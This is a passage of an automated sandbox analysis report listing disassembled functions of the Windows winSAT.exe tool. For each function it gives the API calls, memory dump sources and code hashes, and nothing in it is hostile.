                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDirectoryHandleMutexReleaseRemoveUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1552449126-2481351200
                                                                                                                                                                                              • Opcode ID: f416e2b4cd0de7a8b9abd959c9a6d8b88a265229a069efb71be3da771f9625b7
                                                                                                                                                                                              • Instruction ID: 7fe5efa7f79b385ef6c4fe62707942368d902fec7e69517265036fa433decf57
                                                                                                                                                                                              • Opcode Fuzzy Hash: f416e2b4cd0de7a8b9abd959c9a6d8b88a265229a069efb71be3da771f9625b7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 02416C21E0DA4295FB20BB11F850275EB60FF85B98FE45034D94E027A1CEADF854CB61
                                                                                                                                                                                              Function 00007FF780FA25A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow__uncaught_exceptionstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: s is null
                                                                                                                                                                                              • API String ID: 541657574-2156393446
                                                                                                                                                                                              • Opcode ID: c93c1b0ce5b5c6fb8400d218c608cde4d22ce8a5fba499417f641e0ea8152dde
                                                                                                                                                                                              • Instruction ID: bb8cf8987655b4d11c3fbff50150687ff60d145d6de83fad8ed67ad1ba70fb6a
                                                                                                                                                                                              • Opcode Fuzzy Hash: c93c1b0ce5b5c6fb8400d218c608cde4d22ce8a5fba499417f641e0ea8152dde
                                                                                                                                                                                              • Instruction Fuzzy Hash: DA212962B1DA4681EF20FB26E4613B9A360BF807A4FF49231DA6E073D5DE1CE405C320
                                                                                                                                                                                              Function 00007FF780FDC5D8 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC608
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC658
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC66C
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC6BA
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC508: GetProcessHeap.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC50C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC508: HeapAlloc.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC526
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalHeapSection$AllocEnterErrorFileLastLeaveModuleNameProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2639094630-0
                                                                                                                                                                                              • Opcode ID: b4a040d96479d5300f5f38a9d29bc469aa1d65dc6435333e0e4c961135dff68c
                                                                                                                                                                                              • Instruction ID: e7ef0c3b016e8036dd5fb207480948eeb4d73891e0b7cc1183a396c650631a4e
                                                                                                                                                                                              • Opcode Fuzzy Hash: b4a040d96479d5300f5f38a9d29bc469aa1d65dc6435333e0e4c961135dff68c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 04316E25F0DA428AEB00BB15F984179FBA1FB48B80FF49135CA4D82794DF6DF446CA60
                                                                                                                                                                                              Function 00007FF780FDC508 Relevance: 7.5, APIs: 5, Instructions: 39memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC50C
                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC526
                                                                                                                                                                                              • memset.MSVCRT ref: 00007FF780FDC58B
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC59C
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC5B4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountCriticalHeapSectionSpin$AllocProcessmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2926470208-0
                                                                                                                                                                                              • Opcode ID: f794ea072ace061bcdabc1a9a5e6bfa18bbb94d43a8795dee69ed95d3ab75b36
                                                                                                                                                                                              • Instruction ID: 799793712053406a307a41a3328242d47681c4edff39f27a2d6ae6ba20a1b928
                                                                                                                                                                                              • Opcode Fuzzy Hash: f794ea072ace061bcdabc1a9a5e6bfa18bbb94d43a8795dee69ed95d3ab75b36
                                                                                                                                                                                              • Instruction Fuzzy Hash: 76115225E19A0286EB04A711F814376BBA0FF49704FF5C135C54E467A4DFBDB04ACBA0
                                                                                                                                                                                              Function 00007FF780FDB218 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
                                                                                                                                                                                              • API String ID: 3677997916-3888772845
                                                                                                                                                                                              • Opcode ID: fc62ebe2c2385ee3c78408cdd14c89551aa0f2ea30d2e3f76d5b1e50158c8b22
                                                                                                                                                                                              • Instruction ID: 041a4d46b003757b2d3629eabbbe67b34f771b6995763c4fcc8752eea4cf4e83
                                                                                                                                                                                              • Opcode Fuzzy Hash: fc62ebe2c2385ee3c78408cdd14c89551aa0f2ea30d2e3f76d5b1e50158c8b22
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4721933661CB42C6E7519F16E44426EF6A0F788B91FA48130DE4D03B94DF78E406CB10
                                                                                                                                                                                              Function 00007FF780FA1580 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorHandleInformationLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1721798545-0
                                                                                                                                                                                              • Opcode ID: 5e0c82463fe07ac91af71ac3f507dd92e7409d62f573499886f68774a7cf79a5
                                                                                                                                                                                              • Instruction ID: abba30c4c32b06dd33ab6fc7597e3d0e3704d072a597d3252970965e73027095
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e0c82463fe07ac91af71ac3f507dd92e7409d62f573499886f68774a7cf79a5
                                                                                                                                                                                              • Instruction Fuzzy Hash: D7319526A0C6428DEB10AF22D50437CB7A4FB45BA8FA99335DA1D873D5DF38E455C720
                                                                                                                                                                                              Function 00007FF780FA0DD0 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorHandleInformationLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1721798545-0
                                                                                                                                                                                              • Opcode ID: 24f8e1ea66f60e09965dbda503f6e993699bffc2382317c53ab8f8f15afa119e
                                                                                                                                                                                              • Instruction ID: 768768b71ac5db51eff8ec1828d0cdc6c241bc63e5538c7f2eb8cde498599e81
                                                                                                                                                                                              • Opcode Fuzzy Hash: 24f8e1ea66f60e09965dbda503f6e993699bffc2382317c53ab8f8f15afa119e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 39315E22A0C68286EB50AF26E48437CB7A0FF45BA8FA49631CA1D473D5DF38E455D760
                                                                                                                                                                                              Function 00007FF780FE08D0 Relevance: 4.5, APIs: 3, Instructions: 35registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CloseCreate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3491956904-0
                                                                                                                                                                                              • Opcode ID: 7c58b1e387145f6d17a5e364282639288fe17a23c5ea2c90324191ae0fca8ef3
                                                                                                                                                                                              • Instruction ID: 4f792f99900d39b602998f4a58b57ab7f8bb7d0a31b13e6f2b3b0c459b591821
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c58b1e387145f6d17a5e364282639288fe17a23c5ea2c90324191ae0fca8ef3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 91012C36609B4187E7009F21E840369EA60FF88FA5FA98174DA4E47355CF7CD880CB50
                                                                                                                                                                                              Function 00007FF780FD6F18 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FolderPath
                                                                                                                                                                                              • String ID: Performance\WinSAT
                                                                                                                                                                                              • API String ID: 1514166925-139131759
                                                                                                                                                                                              • Opcode ID: 70b2b7cf9c1b2d178d930af6dff42ed57d7761b73812dfb55d5de9319ebdca7c
                                                                                                                                                                                              • Instruction ID: f8e2182562deef63417f89487d85e424b2414bf3740e184d3374ab01dbce201c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 70b2b7cf9c1b2d178d930af6dff42ed57d7761b73812dfb55d5de9319ebdca7c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 40F06271B1C64342EB00BB25F8411B9A760BF89B84BB49030EE0D473D6DD7CE411C660
                                                                                                                                                                                              Function 00007FF780FE07B4 Relevance: 3.0, APIs: 2, Instructions: 32registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1859126369-0
                                                                                                                                                                                              • Opcode ID: 9bcfd5e39416cb0a68ee3f20240b4bf407e073aee940cf4cfd9d9df3961a40ba
                                                                                                                                                                                              • Instruction ID: c5e440aab1c7972250816f75a80f82c9575fb054372f8d1fbbb715ca7513283d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bcfd5e39416cb0a68ee3f20240b4bf407e073aee940cf4cfd9d9df3961a40ba
                                                                                                                                                                                              • Instruction Fuzzy Hash: 46017832B18B4182EB108F14E08436977A0FB4CB99F618124CB5C0B350CFB9D985CB40
                                                                                                                                                                                              Function 00007FF780FABD1C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CompareString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1825529933-0
                                                                                                                                                                                              • Opcode ID: 0d70ce58825ec7aa03af5e54bb08f34271f411322d4633c8b3bd71953daa176b
                                                                                                                                                                                              • Instruction ID: 2bd9ed853f4dbbbd327f7083d5f3b20065dd2ec8738530937040b2e50ac81123
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d70ce58825ec7aa03af5e54bb08f34271f411322d4633c8b3bd71953daa176b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0711A732F1CB5182E7219A1AE040169F7A0FB84B98F64D239DA5C53BD8CF7CE861D740
                                                                                                                                                                                              Function 00007FF780FA3D00 Relevance: 1.3, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memmove
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2162964266-0
                                                                                                                                                                                              • Opcode ID: 1f1af428b4f5fe6877a3218c9703f0762fd35da84d640b4b1d6d9b9071d4e4c6
                                                                                                                                                                                              • Instruction ID: 7d0f59d0e4ba519883717da7a17831332840e36ce5939db0c8d863ba958cba27
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f1af428b4f5fe6877a3218c9703f0762fd35da84d640b4b1d6d9b9071d4e4c6
                                                                                                                                                                                              • Instruction Fuzzy Hash: E4214636704B9892DA149F26EA8429877A5F348FE0F948232DF6C47B91CF39E462C310
                                                                                                                                                                                              Function 00007FF780F92680 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
